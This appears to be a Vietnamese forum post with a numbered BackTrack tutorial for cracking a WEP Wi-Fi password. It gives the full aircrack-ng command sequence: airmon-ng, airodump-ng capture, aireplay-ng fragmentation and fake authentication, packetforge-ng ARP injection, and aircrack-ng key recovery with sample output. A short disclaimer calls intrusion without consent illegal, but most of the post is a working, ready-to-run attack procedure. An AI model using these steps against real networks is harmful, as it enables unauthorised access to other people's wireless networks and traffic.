Bài này mình tập hợp từ các tip hướng dẫn trên mạng và đã test thành công trên máy mình.

Và xin nhắc lại đây chỉ là bài hướng dẫn nhằm mục đích học hỏi về các
kiến thức bảo mật, mọi hành vi xâm nhập vào mạng người khác mà không có
sự đông ý là PHẠM PHÁP.

Đầu tiên hãy khởi dộng Backtrack từ CD hoặc USB.

Dùng lênh startx để vào màn hình đồ họa của Backtrack,

Sau đó bật cửa sổ Shell, biểu tượng nhỏ màu đen nằm ở góc trái phía dưới thanh trạng thái.

[You must be registered and logged in to see this link.]

Mở Shell 1

Dùng lệnh iwconfig để kiểm tra card mạng đang sử dụng của mình.

[You must be registered and logged in to see this link.]

Như trong hình thì card mạng của mình có tên là wlan0

[1] airmon-ng start wlan0

[2] airodump-ng mon0

[You must be registered and logged in to see this link.]

Khi đã tìm thấy Access Point (AP) cần lấy pass ta bấm Ctrt + C để dừng quá trình quét.



Kết quả trên màn hình sẽ cho ta thấy địa chỉ MAC của AP (BSSID), Channel (CH), Tên AP (ESSID)

BSSID: 00:14:6C:02:C0:FE

CH: 11

ESSID: NETGEAR

–> chú ý những thông số này sẽ thay đổi theo từng cấu hình máy của bạn, Access Point …

[3] airodump-ng –bssid 00:14:6C:02:C0:FE –channel 11 -w NETGEAT mon0

[You must be registered and logged in to see this link.]

Khi thực thi xong lệnh trên, thì trên màn hình desktop sẽ xuất hiện
một số file mới, ta sẽ chú ý đến file NETGEAR-01.cap vừa mới tạo.



Mở Shell 2

[4] aireplay-ng -5 -b 00:14:6C:02:C0:FE mon0

[You must be registered and logged in to see this link.]

Chờ một chút, đến khi xuất hiện thông báo Use this packet ? chọn Yes (có thể dùng chữ y)



Mở Shell 3

[5] aireplay-ng -1 1 -a 00:14:6C:02:C0:FE mon0

[You must be registered and logged in to see this link.]

Quay lại Shell 2 kiểm tra file vừa tạo xong ở đây ta được file fragment-1005-2004845.xor

[6] packetforge-ng -0 -a
00:14:6C:02:C0:FE -h 00:11:22:33:44:55 -l 255.255.255.255 -k
255.255.255.255 -y fragment-1005-2004845.xor -w arpy

[7] aireplay-ng -3 -r arpy -b 00:14:6C:02:C0:FE mon0

Khi thực hiện lệnh trên thì số lượng data thu nhận ở
Shell 1 tăng lên nhanh chóng, theo thông tin thì để crack wep 64bit thì
cần tối thiểu 20.000 packet, crack wep 128bit thì cần tối thiểu 40.000
packet. Do đó để đạt hiệu quả tối đa bạn nên chờ đến khi đạt đến số
lượng như trên để thực hiện tiếp dòng lệnh tiếp theo.



Mở Shell 4

[8] aircrack-ng NETGEAR-01.cap

NETGEAR-01.cap là file được tạo từ bước 1

Và bây giờ bạn hãy xem thành quả của mình.

[You must be registered and logged in to see this link.]

KEY FOUND ! [D4 :F5 :07 E :E5]

Key bạn cần tìm sẽ là D4F507DEE5.



Chú ý:

00:14:6C:02:C0:FE –> địa chỉ Access Point

wlan0 –> tên card mạng của bạn

mon0 –> interface card mạng của bạn

bấm vào hình để xem hình lớn



Tip:

Bạn có thể tạo cho mình bản Backtrack 4 Pre Final boot từ USB bằng cách sử dụng unetbootin-windows-319.exe.

Có thể tải tại [You must be registered and logged in to see this link.]

Cách sử dụng rất đơn giản, điều bạn cần làm là đưa USB vào máy.

[You must be registered and logged in to see this link.]

Ở phần Distribition bạn chọn là Backtrack, ở ô kế tiếp bạn có thể
chọn phiên bản, do Backtrack 4 Pre Final vẫn chưa hỗ trợ boot từ USB nên
bạn cứ chọn là 3.

Phần Diskimage chọn file iso của Backtrack 4 Pre Final mà bạn đã tải về.

Chọn USB cần tạo ở mục Drive (chương trình sẽ tự chọn nếu bạn chỉ căm 1 usb vào máy)

OK ! và chờ trong ít phút … Enjoy !!!



Download:

Bạn có thể tải về tất cả các phiên bản của Backtrack tại đây: [You must be registered and logged in to see this link.]

Ebook: [You must be registered and logged in to see this link.]

Wiki: [You must be registered and logged in to see this link.]







Tham khảo tip hướng dãn của [You must be registered and logged in to see this link.]: [You must be registered and logged in to see this link.]

Video:

• Wep Cracking 1
  

• Wep Cracking 2